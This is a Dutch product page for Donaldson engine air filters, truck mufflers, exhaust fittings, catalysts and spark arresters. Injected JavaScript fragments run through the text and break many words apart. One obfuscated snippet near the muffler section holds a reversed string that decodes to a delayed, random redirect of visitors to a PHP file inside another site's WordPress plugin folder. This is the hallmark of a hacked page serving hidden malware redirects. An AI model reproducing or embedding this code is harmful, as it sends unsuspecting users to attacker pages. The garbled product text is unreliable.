Complete luchtfilters, uitlaatpotten en alle wisselstukken en toebehoren.

Donaldson produceert luchtfilters en aanzuigsystemen voor alle voertuigen en machines, van het lichtste tot het zwaarste. Onze filters zijn ontworpen om een maximale bescherming van de motoren te verzekeren, en dit zelfs in de meest extreme omstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden.

PowerCore oplossingen

De complete filters PSD PowerCore in 2-traps uitvoering bevatten een geïntegreerde hoog efficiënte voorfilter, een primaire en een secondaire filter. De PSD PowerCore is speciaal ontworpen voor “on-road” en “off-road” outillage die onder middelzware of zware werkomstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden moet functionneren. Donaldson beantwoordt met dit gamma aan de vraag van de constructeurs naar een kleiner,  ruimtebesparend, krachtig filterpakket met een grotere efficiëntie !

“Light duty” oplossingen

Complete filteroplossingen voor motoren die in een weing stofrijke omgeving werken. Deze filters zijn reeds origineel gemonteerd op vrachtwagens, generatoren, heftrucks…

“Medium duty” oplossingen

Voor voertuigen die in middelzware stofomstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden werken. Dit gamma is vooral gericht op landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andbouwvoertuigen, industriële voertuigen, werfgeneratoren…

“Heavy duty” oplossingen

Voor extreme behoeftes en zeer fijn stof ontwikkelt Donaldson verscheidene complete filters die toelaten in buitengewone omstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden te werken. Dit soort filters wordt gemonteerd op machines die in groeves of mijnen werken en voor materieel op uitheemse werven.
 
In de VS is Donaldson de absolute marktleider voor mufflers voor vrachtwagens. Wij bieden meer dan 150 vervangingsmufflers aan, waaronder de M100465, de meest verkochte muffler in deze sector. Indien u een wisselstuk zoekt voor uw werfmachine moet u beslist ons nieuw gamma muffler in gealuminiseerd staal ontdekken. Er zijn 5 versies beschikbaar met een zwarte hoge temperatuur coating die op  verscheidene manieren kunnen worden gemonteerd. Ook de bijbehorende montagebeugels zijn beschikbaar. Met deze 6 versies kan dit gamma de volledige vraag beantwoorden. Contacteer ons en samen vinden wij de beste oplossing voor uw behoeftes:                                  
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toebehoren”]

Verbindingsstukken en flexibels

Hoewel er nagenoeg geen mankementen optreden, biedt Donaldson toch een compleet gamma toebehoren aan om inlaatsystemen te herstellen: indicatoren, rubber elbows, verlengbuizen, vacuatorkleppen, beugels, flensen, verbindingsstukken voor uitlaten,… Verbindingsstukken, elbows, gebogen buizen, aansluitingen en reducties. Wat u ook zoekt als aansluiting voor uw halfzware en zware machines, Donaldson beschikt zeker over de gepaste oplossing.

Verticale uitlaten en uitlaatstlangen

Gebogen, rechte, lange, oversized, 90°,.. uitlaten, Donaldson beschikt steeds over een oplossing voor uw toepassing. Beschikbaar in inox, chroom en gealuminiseerd.

Montageflensen voor uitlaten

Deze flensen zijn special ontworpen voor de waterdichtheid van de in- en uitgangen. Er is een ruime keuze aan flensen in roestvrij of gealuminiseerd staal. Onze flensen garandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen de perfecte dichtheid van al uw toepassingen.

Regenkappen

Wij hebben een breed gamma regenkappen die zullen verhinderen dat de regen de luchtingang, uw filter en bijgevolg uw motor bereikt. Welk ook de afmetingen, wij vinden wat u nodig heeft;  
Binnen de ideale motor zou de brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof zich met de lucht vermengen en volledig verbrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden in het verbindingsvat en zouden  enkel niet toxische gassen worden geproduceerd (koolstofdioxide CO2 en waterdamp H2O). Maar jammer genoeg bestaat er nog steeds geen ideale motor en dus gebeurt de verbrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding niet perfect en zitten er toxische deeltjes in de uitlaatgassen. Een Aircat catalysator, passend bij uw motor, zo dicht mogelijk bij de uitlaatpot installeren, laat toe de schadelijke polluanten om te zetten in niet schadelijke gassen (koolstofdioxide, water, stikstof) catalysatie. Welke catalysateur past het best op uw machine ? Contacteer ons en wij vinden samen met u de perfecte oplossing!
De US Forest Service heeft Donaldson benaderd omdat de Donaldson vonkenvangers aanzienlijk het risico op een vlam of een genster in de uitlaat verminderd. Ze kunnen zowel verticaal als horizontaal worden gemonteerd en werken met de middelpuntvliedende kracht die de vaste lichamen van de uitlaatgassen scheidt. Welke vonkenvanger heeft U nodig? Contacteer ons en wij vinden samen met u de perfecte oplossing!